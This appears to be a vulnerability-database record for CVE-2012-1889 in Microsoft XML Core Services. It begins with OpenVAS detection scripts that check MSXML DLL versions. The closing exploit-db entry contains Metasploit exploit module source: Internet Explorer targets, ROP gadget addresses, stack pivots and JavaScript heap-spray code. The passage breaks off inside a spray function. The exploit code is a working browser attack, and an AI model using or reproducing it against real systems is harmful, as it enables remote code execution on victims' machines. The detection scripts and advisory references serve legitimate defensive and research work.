Groove Server 2007 Service Pack 3 and prior\n Microsoft SharePoint Server 2007 
Service Pack 3 and prior\n Microsoft Windows XP x32 Edition Service Pack 3 and prior\n Microsoft Windows XP x64 Edition Service Pack 2 and prior\n Microsoft Windows 7 x32/x64 Edition Service Pack 1 and prior\n Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n Microsoft Windows Vista x32/x64 Edition Service Pack 2 and prior\n Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1 and prior\n Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior\");\n\n script_tag(name: \"solution\" , value:\"Apply the Patch from below links,\n http://technet.microsoft.com/en-us/security/advisory/2719615\n http://technet.microsoft.com/en-us/security/bulletin/ms12-043\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/49456\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/id/1027157\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2719615\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/advisory/2719615\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms12-043\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\",\n \"secpod_office_products_version_900032.nasl\",\n \"gb_ms_sharepoint_sever_n_foundation_detect.nasl\",\n \"gb_ms_expression_web_detect.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nsysPath = \"\";\ndllVer3 = \"\";\ndllVer4 = \"\";\ndllVer5 = \"\";\ndllVer6 = \"\";\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, 
winVista:3, win7:2,\n win7x64:2, win2008:3, win2008r2:2) <= 0)\n{\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(! sysPath){\n exit(0);\n}\n\n## Get Version from Msxml3.dll file\ndllVer3 = fetch_file_version(sysPath, file_name:\"system32\\Msxml3.dll\");\n\n## Check for XML Core Services 3.0\nif(dllVer3)\n{\n ## Windows XP\n if(hotfix_check_sp(xp:4) > 0)\n {\n ## Check for Msxml3.dll version before 8.100.1053.0\n if(version_is_less(version:dllVer3, test_version:\"8.100.1053.0\"))\n {\n Vulnerable_range = \"Version Less than - 8.100.1053.0\";\n VULN = TRUE ;\n }\n }\n\n ## Windows 2003 x86, Windows XP x64 and Windows 2003 x64\n else if(hotfix_check_sp(win2003:3, xpx64:3, win2003x64:3) > 0)\n {\n ## Check for Msxml3.dll version\n if(version_is_less(version:dllVer3, test_version:\"8.100.1052.0\"))\n {\n Vulnerable_range = \"Version Less than - 8.100.1052.0\";\n VULN = TRUE ;\n }\n }\n\n ## Windows Vista and Windows Server 2008\n ## Currently not supporting for Vista and Windows Server 2008 64 bit\n else if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n {\n ## Check for Msxml3.dll version\n if(version_is_less(version:dllVer3, test_version:\"8.100.5005.0\"))\n {\n Vulnerable_range = \"Version Less than - 8.100.5005.0\";\n VULN = TRUE ;\n }\n }\n\n ## Windows 7\n else if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n {\n ## Check for Msxml3.dll version\n if(version_is_less(version:dllVer3, test_version:\"8.110.7600.17036\")){\n Vulnerable_range = \"Version Less than - 8.110.7600.17036\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer3, test_version:\"8.110.7600.20000\", test_version2:\"8.110.7600.21226\")){\n Vulnerable_range = \"8.110.7600.20000 - 8.110.7600.21226\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer3, test_version:\"8.110.7601.17000\", test_version2:\"8.110.7601.17856\")){\n Vulnerable_range = \"8.110.7601.17000 - 8.110.7601.17856\";\n VULN = TRUE ; \n }\n else 
if(version_in_range(version:dllVer3, test_version:\"8.110.7601.21000\", test_version2:\"8.110.7601.22011\"))\n {\n Vulnerable_range = \"8.110.7601.21000 - 8.110.7601.22011\";\n VULN = TRUE ;\n }\n }\n dllVer = dllVer3 ;\n location = sysPath + \"\\system32\\Msxml3.dll\";\n}\n\n## Get Version from Msxml4.dll file\ndllVer4 = fetch_file_version(sysPath, file_name:\"system32\\Msxml4.dll\");\n\n## Check for XML Core Services 4.0\nif(dllVer4)\n{\n if(version_is_less(version:dllVer4, test_version:\"4.30.2114.0\"))\n {\n dllVer = dllVer4 ;\n Vulnerable_range = \"Version Less than - 4.30.2114.0\";\n location = sysPath + \"\\system32\\Msxml4.dll\";\n VULN = TRUE ;\n }\n}\n\n## Get Version from Msxml6.dll file\ndllVer6 = fetch_file_version(sysPath, file_name:\"system32\\Msxml6.dll\");\n\n## Check for XML Core Services 6.0\ndllVer6 = fetch_file_version(sysPath, file_name:\"system32\\Msxml6.dll\");\nif(dllVer6)\n{\n ## Windows XP\n if(hotfix_check_sp(xp:4) > 0)\n {\n ## Check for Msxml6.dll version before 6.20.2501.0\n if(version_is_less(version:dllVer6, test_version:\"6.20.2501.0\"))\n {\n Vulnerable_range = \"Version Less than - 6.20.2501.0\";\n VULN = TRUE ;\n }\n }\n\n ## Windows 2003 x86, Windows XP x64 and Windows 2003 x64\n else if(hotfix_check_sp(win2003:3, xpx64:3, win2003x64:3) > 0)\n {\n ## Check for Msxml6.dll version before 6.20.2012.0\n if(version_is_less(version:dllVer6, test_version:\"6.20.2012.0\"))\n {\n Vulnerable_range = \"Version Less than - 6.20.2012.0\";\n VULN = TRUE ;\n }\n }\n\n ## Windows Vista and Windows Server 2008\n ## Currently not supporting for Vista and Windows Server 2008 64 bit\n else if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n {\n ## Check for Msxml6.dll version\n if(version_is_less(version:dllVer6, test_version:\"6.20.5005.0\"))\n {\n Vulnerable_range = \"Version Less than - 6.20.5005.0\";\n VULN = TRUE ;\n }\n }\n\n ## Windows 7\n else if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n {\n ## Check for Msxml3.dll version\n 
if(version_is_less(version:dllVer6, test_version:\"6.30.7600.17036\")){\n Vulnerable_range = \"Version Less than - 6.30.7600.17036\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer6, test_version:\"6.30.7600.20000\", test_version2:\"6.30.7600.21226\")){\n Vulnerable_range = \"6.30.7600.20000 - 6.30.7600.21226\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer6, test_version:\"6.30.7601.17000\", test_version2:\"6.30.7601.17856\")){\n Vulnerable_range = \"6.30.7601.17000 - 6.30.7601.17856\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer6, test_version:\"6.30.7601.21000\", test_version2:\"6.30.7601.22011\")){\n Vulnerable_range = \"6.30.7601.21000 - 6.30.7601.22011\";\n VULN = TRUE ;\n }\n }\n\n dllVer = dllVer6;\n location = sysPath + \"\\system32\\Msxml6.dll\";\n}\n\nif(VULN)\n{\n report = 'File checked: ' + location + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\n## Check for XML Core Services 5.0\n## Check for Office 2003, 2007, Word Viewer, Compatibility Pack,\n## Groove server 2007 , Sharepoint Server 2007\nif(get_kb_item(\"MS/Office/Ver\") =~ \"^[11|12].*\" ||\n get_kb_item(\"SMB/Office/Word/Version\") ||\n get_kb_item(\"SMB/Office/WordCnv/Version\")||\n get_kb_item(\"SMB/Office/Groove/Version\") =~ \"^12\"||\n get_kb_item(\"MS/SharePoint/Server/Ver\") =~ \"^12\" ||\n get_kb_item(\"MS/Expression-Web/Ver\") =~ \"^12\")\n{\n ## Get System CommonFiles Dir Path\n sysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\n if(! sysPath){\n exit(0);\n }\n\n ## Get Version from office patch\n foreach ver (make_list(\"OFFICE11\", \"OFFICE12\"))\n {\n ## Get Version from Msxml5.dll\n sysPath = sysPath + \"\\Microsoft Shared\\\" + ver ;\n\n ## Get Version from Msxml4.dll file\n dllVer5 = fetch_file_version(sysPath, file_name:\"Msxml5.dll\");\n\n if(! 
dllVer5){\n continue;\n }\n\n ## Check for Msxml6.dll version\n if(version_is_less(version:dllVer5, test_version:\"5.20.1096.0\"))\n {\n report = 'File checked: ' + sysPath + \"\\system32\\Msxml5.dll\" + '\\n' +\n 'File version: ' + dllVer5 + '\\n' +\n 'Vulnerable range: Version Less than - 5.20.1096.0 \\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-08T14:03:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1889"], "description": "This host is installed with Microsoft XML Core Services and\n is prone to remote code execution vulnerability.", "modified": "2020-01-07T00:00:00", "published": "2012-06-14T00:00:00", "id": "OPENVAS:1361412562310802864", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802864", "type": "openvas", "title": "Microsoft XML Core Services Remote Code Execution Vulnerability (2719615)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft XML Core Services Remote Code Execution Vulnerability (2719615)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802864\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_cve_id(\"CVE-2012-1889\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-06-14 12:09:11 +0530 (Thu, 14 Jun 2012)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft XML Core Services Remote Code Execution Vulnerability (2719615)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Microsoft XML Core Services and\n is prone to remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Microsoft XML Core Services attempts to access\n an object in memory that has not been initialized, which allows an attacker to\n corrupt memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote\n attackers to execute arbitrary code as the logged-on user.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Expression Web 2\n\n - Microsoft Office Word Viewer\n\n - Microsoft Office Compatibility\n\n - Microsoft Office 2003 Service Pack 3 and prior\n\n - Microsoft Office 2007 Service Pack 3 and prior\n\n - Microsoft Expression Web Service Pack 1 and prior\n\n - Microsoft Groove Server 2007 Service Pack 3 and prior\n\n - Microsoft SharePoint Server 2007 Service 
Pack 3 and prior\n\n - Microsoft Windows XP x32 Edition Service Pack 3 and prior\n\n - Microsoft Windows XP x64 Edition Service Pack 2 and prior\n\n - Microsoft Windows 7 x32/x64 Edition Service Pack 1 and prior\n\n - Microsoft Windows 2003 x32/x64 Edition Service Pack 2 and prior\n\n - Microsoft Windows Vista x32/x64 Edition Service Pack 2 and prior\n\n - Microsoft Windows Server 2008 R2 x64 Edition Service Pack 1 and prior\n\n - Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior\");\n\n script_tag(name:\"solution\", value:\"Apply the patch from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id/1027157\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2719615\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2012/2719615\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-043\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\", \"secpod_office_products_version_900032.nasl\",\n \"gb_ms_sharepoint_sever_n_foundation_detect.nasl\", \"gb_ms_expression_web_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, xpx64:3, win2003:3, win2003x64:3, winVista:3, win7:2,\n win7x64:2, win2008:3, win2008r2:2) <= 0)\n{\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(! 
sysPath){\n exit(0);\n}\n\ndllVer3 = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Msxml3.dll\");\n\nif(dllVer3)\n{\n if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:dllVer3, test_version:\"8.100.1053.0\"))\n {\n Vulnerable_range = \"Version Less than - 8.100.1053.0\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2003:3, xpx64:3, win2003x64:3) > 0)\n {\n if(version_is_less(version:dllVer3, test_version:\"8.100.1052.0\"))\n {\n Vulnerable_range = \"Version Less than - 8.100.1052.0\";\n VULN = TRUE ;\n }\n }\n\n ## Currently not supporting for Vista and Windows Server 2008 64 bit\n else if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n {\n if(version_is_less(version:dllVer3, test_version:\"8.100.5005.0\"))\n {\n Vulnerable_range = \"Version Less than - 8.100.5005.0\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n {\n if(version_is_less(version:dllVer3, test_version:\"8.110.7600.17036\")){\n Vulnerable_range = \"Version Less than - 8.110.7600.17036\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer3, test_version:\"8.110.7600.20000\", test_version2:\"8.110.7600.21226\")){\n Vulnerable_range = \"8.110.7600.20000 - 8.110.7600.21226\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer3, test_version:\"8.110.7601.17000\", test_version2:\"8.110.7601.17856\")){\n Vulnerable_range = \"8.110.7601.17000 - 8.110.7601.17856\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer3, test_version:\"8.110.7601.21000\", test_version2:\"8.110.7601.22011\"))\n {\n Vulnerable_range = \"8.110.7601.21000 - 8.110.7601.22011\";\n VULN = TRUE ;\n }\n }\n dllVer = dllVer3 ;\n location = sysPath + \"\\system32\\Msxml3.dll\";\n}\n\ndllVer4 = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Msxml4.dll\");\n\nif(dllVer4)\n{\n if(version_is_less(version:dllVer4, test_version:\"4.30.2114.0\"))\n {\n dllVer = dllVer4 ;\n Vulnerable_range = \"Version Less than - 
4.30.2114.0\";\n location = sysPath + \"\\system32\\Msxml4.dll\";\n VULN = TRUE ;\n }\n}\n\ndllVer6 = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Msxml6.dll\");\n\ndllVer6 = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Msxml6.dll\");\nif(dllVer6)\n{\n if(hotfix_check_sp(xp:4) > 0)\n {\n if(version_is_less(version:dllVer6, test_version:\"6.20.2501.0\"))\n {\n Vulnerable_range = \"Version Less than - 6.20.2501.0\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win2003:3, xpx64:3, win2003x64:3) > 0)\n {\n if(version_is_less(version:dllVer6, test_version:\"6.20.2012.0\"))\n {\n Vulnerable_range = \"Version Less than - 6.20.2012.0\";\n VULN = TRUE ;\n }\n }\n\n ## Currently not supporting for Vista and Windows Server 2008 64 bit\n else if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n {\n if(version_is_less(version:dllVer6, test_version:\"6.20.5005.0\"))\n {\n Vulnerable_range = \"Version Less than - 6.20.5005.0\";\n VULN = TRUE ;\n }\n }\n\n else if(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) > 0)\n {\n if(version_is_less(version:dllVer6, test_version:\"6.30.7600.17036\")){\n Vulnerable_range = \"Version Less than - 6.30.7600.17036\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer6, test_version:\"6.30.7600.20000\", test_version2:\"6.30.7600.21226\")){\n Vulnerable_range = \"6.30.7600.20000 - 6.30.7600.21226\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer6, test_version:\"6.30.7601.17000\", test_version2:\"6.30.7601.17856\")){\n Vulnerable_range = \"6.30.7601.17000 - 6.30.7601.17856\";\n VULN = TRUE ;\n }\n else if(version_in_range(version:dllVer6, test_version:\"6.30.7601.21000\", test_version2:\"6.30.7601.22011\")){\n Vulnerable_range = \"6.30.7601.21000 - 6.30.7601.22011\";\n VULN = TRUE ;\n }\n }\n\n dllVer = dllVer6;\n location = sysPath + \"\\system32\\Msxml6.dll\";\n}\n\nif(VULN)\n{\n report = 'File checked: ' + location + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: ' + 
Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nofficeVer = get_kb_item(\"MS/Office/Ver\");\nwordVer = get_kb_item(\"SMB/Office/Word/Version\");\nwordCnvVer = get_kb_item(\"SMB/Office/WordCnv/Version\");\ngrooveVer = get_kb_item(\"SMB/Office/Groove/Version\");\nshrPtSrvVer = get_kb_item(\"MS/SharePoint/Server/Ver\");\nexpressWebVer = get_kb_item(\"MS/Expression-Web/Ver\");\n\n## Groove server 2007 , Sharepoint Server 2007\nif((officeVer && officeVer =~ \"^1[12]\\.\") ||\n wordVer || wordCnvVer ||\n (grooveVer && grooveVer =~ \"^12\\.\") ||\n (shrPtSrvVer && shrPtSrvVer =~ \"^12\\.\") ||\n (expressWebVer && expressWebVer =~ \"^12\\.\"))\n{\n sysPath = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\", item:\"CommonFilesDir\");\n if(! sysPath){\n exit(0);\n }\n\n foreach ver (make_list(\"OFFICE11\", \"OFFICE12\"))\n {\n sysPath = sysPath + \"\\Microsoft Shared\\\" + ver ;\n\n dllVer5 = fetch_file_version(sysPath:sysPath, file_name:\"Msxml5.dll\");\n\n if(! dllVer5){\n continue;\n }\n\n if(version_is_less(version:dllVer5, test_version:\"5.20.1096.0\"))\n {\n report = 'File checked: ' + sysPath + \"\\system32\\Msxml5.dll\" + '\\n' +\n 'File version: ' + dllVer5 + '\\n' +\n 'Vulnerable range: Version Less than - 5.20.1096.0 \\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T11:15:18", "description": "Microsoft XML Core Services MSXML Uninitialized Memory Corruption. CVE-2012-1889. 
Remote exploit for windows platform", "published": "2012-06-16T00:00:00", "type": "exploitdb", "title": "Microsoft XML Core Services MSXML Uninitialized Memory Corruption", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1889"], "modified": "2012-06-16T00:00:00", "id": "EDB-ID:19186", "href": "https://www.exploit-db.com/exploits/19186/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::RopDb\r\n include Msf::Exploit::Remote::BrowserAutopwn\r\n autopwn_info({\r\n :ua_name => HttpClients::IE,\r\n :ua_minver => \"6.0\",\r\n :ua_maxver => \"9.0\",\r\n :javascript => true,\r\n :os_name => OperatingSystems::WINDOWS,\r\n :classid => \"{f6D90f11-9c73-11d3-b32e-00C04f990bb4}\",\r\n :method => \"definition\",\r\n :rank => GoodRanking\r\n })\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption\",\r\n 'Description' => %q{\r\n This module exploits a memory corruption flaw in Microsoft XML Core Services\r\n when trying to access an uninitialized Node with the getDefinition API, which\r\n may corrupt memory allowing remote code execution.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'inking26', # Reliable exploitation\r\n 'binjo', # Metasploit module\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2012-1889' ],\r\n [ 'BID', '53934' ],\r\n [ 'OSVDB', '82873'],\r\n [ 'MSB', 'MS12-043'],\r\n [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ],\r\n [ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ],\r\n [ 'URL', 
'http://hi.baidu.com/inking26/blog/item/9c2ab11c4784e5aa86d6b6c1.html' ],\r\n [ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\",\r\n 'Space' => 1024\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"process\",\r\n 'InitialAutoRunScript' => 'migrate -f'\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n # msxml3.dll 8.90.1101.0\r\n [ 'Automatic', {} ],\r\n [\r\n 'IE 6 on Windows XP SP3',\r\n {\r\n 'Offset' => '0x100',\r\n 'Rop' => nil,\r\n 'RandomHeap' => false\r\n }\r\n ],\r\n [\r\n 'IE 7 on Windows XP SP3 / Vista SP2',\r\n {\r\n 'Offset' => '0x100',\r\n 'Rop' => nil,\r\n 'RandomHeap' => false\r\n }\r\n ],\r\n [\r\n 'IE 8 on Windows XP SP3',\r\n {\r\n 'Rop' => :msvcrt,\r\n 'RandomHeap' => false,\r\n 'RopChainOffset' => '0x5f4',\r\n 'Offset' => '0x0',\r\n 'StackPivot' => 0x77c15ed5, # xchg eax, esp # ret # from msvcrt.dll\r\n }\r\n ],\r\n [\r\n 'IE 8 with Java 6 on Windows XP SP3',\r\n {\r\n 'Rop' => :jre,\r\n 'RandomHeap' => false,\r\n 'RopChainOffset' => '0x5f4',\r\n 'Offset' => '0x0',\r\n 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\r\n }\r\n ],\r\n [\r\n 'IE 8 with Java 6 on Windows 7 SP1/Vista SP2',\r\n {\r\n 'Rop' => :jre,\r\n 'RandomHeap' => false,\r\n 'RopChainOffset' => '0x5f4',\r\n 'Offset' => '0x0',\r\n 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\r\n }\r\n ],\r\n [\r\n 'IE 9 with Java 6 on Windows 7 SP1',\r\n {\r\n 'Rop' => :jre,\r\n 'RandomHeap' => true,\r\n 'RopChainOffset' => 0x5FC,\r\n 'Offset' => '0x0',\r\n 'StackPivot' => 0x7c348b05 # xchg eax, esp # ret # from msvcr71.dll\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Jun 12 2012\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\r\n ], self.class)\r\n end\r\n\r\n def 
get_target(agent)\r\n #If the user is already specified by the user, we'll just use that\r\n return target if target.name != 'Automatic'\r\n\r\n if agent =~ /NT 5\\.1/ and agent =~ /MSIE 6/\r\n return targets[1] #IE 6 on Windows XP SP3\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 7/\r\n return targets[2] #IE 7 on Windows XP SP3\r\n elsif agent =~ /NT 6\\.0/ and agent =~ /MSIE 7/\r\n return targets[2] #IE 7 on Windows Vista SP2\r\n elsif agent =~ /NT 5\\.1/ and agent =~ /MSIE 8/\r\n return targets[3] #IE 8 on Windows XP SP3\r\n elsif agent =~ /NT 6\\.[01]/ and agent =~ /MSIE 8/\r\n return targets[5] #IE 8 on Windows 7 SP1/Vista SP2\r\n elsif agent =~ /NT 6\\.1/ and agent =~ /MSIE 9/\r\n return targets[6] #IE 9 on Windows 7 SP1\r\n else\r\n return nil\r\n end\r\n end\r\n\r\n def ret(t)\r\n case t['Rop']\r\n when :msvcrt\r\n return [ 0x77c4ec01 ].pack(\"V\") # RETN (ROP NOP) # msvcrt.dll\r\n when :jre\r\n return [ 0x7c347f98 ].pack(\"V\") # RETN (ROP NOP) # msvcr71.dll\r\n end\r\n end\r\n\r\n def popret(t)\r\n case t['Rop']\r\n when :msvcrt\r\n return [ 0x77c4ec00 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcrt.dll\r\n when :jre\r\n return [ 0x7c376541 ].pack(\"V\") # POP EBP # RETN (ROP NOP) # msvcr71.dll\r\n end\r\n end\r\n\r\n def get_rop_chain(t)\r\n if t['RandomHeap']\r\n adjust = [ 0x0c0c0c0c ].pack(\"V\") # heap isn't filled with pointers to 0x0c0c0c0c\r\n adjust << ret(t)\r\n else\r\n adjust = ret(t)\r\n end\r\n\r\n adjust << popret(t)\r\n adjust << [ t['StackPivot'] ].pack(\"V\")\r\n adjust << ret(t) * 4 # first call to a \"ret\" because there is a good gadget in the stack :)\r\n\r\n # Both ROP chains generated by mona.py - See corelan.be\r\n case t['Rop']\r\n when :msvcrt\r\n print_status(\"Using msvcrt ROP\")\r\n rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})\r\n\r\n else\r\n print_status(\"Using JRE ROP\")\r\n rop = generate_rop_payload('java','',{'pivot'=>adjust})\r\n end\r\n\r\n return rop\r\n end\r\n\r\n def 
get_easy_spray(t, js_code, js_nops)\r\n\r\n spray = <<-JS\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n\r\n while (nops.length < 0x80000) nops += nops;\r\n\r\n var offset = nops.substring(0, #{t['Offset']});\r\n var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);\r\n\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n\r\n\r\n heap_obj.gc();\r\n for (var z=1; z < 0x230; z++) {\r\n heap_obj.alloc(block);\r\n }\r\n\r\n JS\r\n\r\n return spray\r\n\r\n end\r\n\r\n\r\n def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)\r\n\r\n spray = <<-JS\r\n\r\n var heap_obj = new heapLib.ie(0x20000);\r\n var code = unescape(\"#{js_code}\");\r\n var nops = unescape(\"#{js_nops}\");\r\n var nops_90 = unescape(\"#{js_90_nops}\");\r\n var rop_chain = unescape(\"#{js_rop}\");\r\n\r\n while (nops.length < 0x80000) nops += nops;\r\n while (nops_90.length < 0x80000) nops_90 += nops_90;\r\n\r\n var offset = nops.substring(0, #{t['Offset']});\r\n var nops_padding = nops.substring(0, #{t['RopChainOffset']}-code.length-offset.length);\r\n var shellcode = offset + code + nops_padding + rop_chain + nops_90.substring(0, 0x800-code.length-nops_padding.length-rop_chain.length);\r\n\r\n\r\n while (shellcode.length < 0x40000) shellcode += shellcode;\r\n var block = shellcode.substring(0, (0x80000-6)/2);\r\n\r\n\r\n heap_obj.gc();\r\n for (var z=1; z < 0x230; z++) {\r\n heap_obj.alloc(block);\r\n }\r\n\r\n JS\r\n\r\n return spray\r\n\r\n end\r\n\r\n # Spray published by corelanc0d3r\r\n # Exploit writing tutorial part 11 : Heap Spraying Demystified\r\n # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/\r\n def get_random_spray(t, js_rop, js_code, js_90_nops)\r\n\r\n spray = <<-JS\r\n\r\n function randomblock(blocksize)\r\n {\r\n var theblock = 
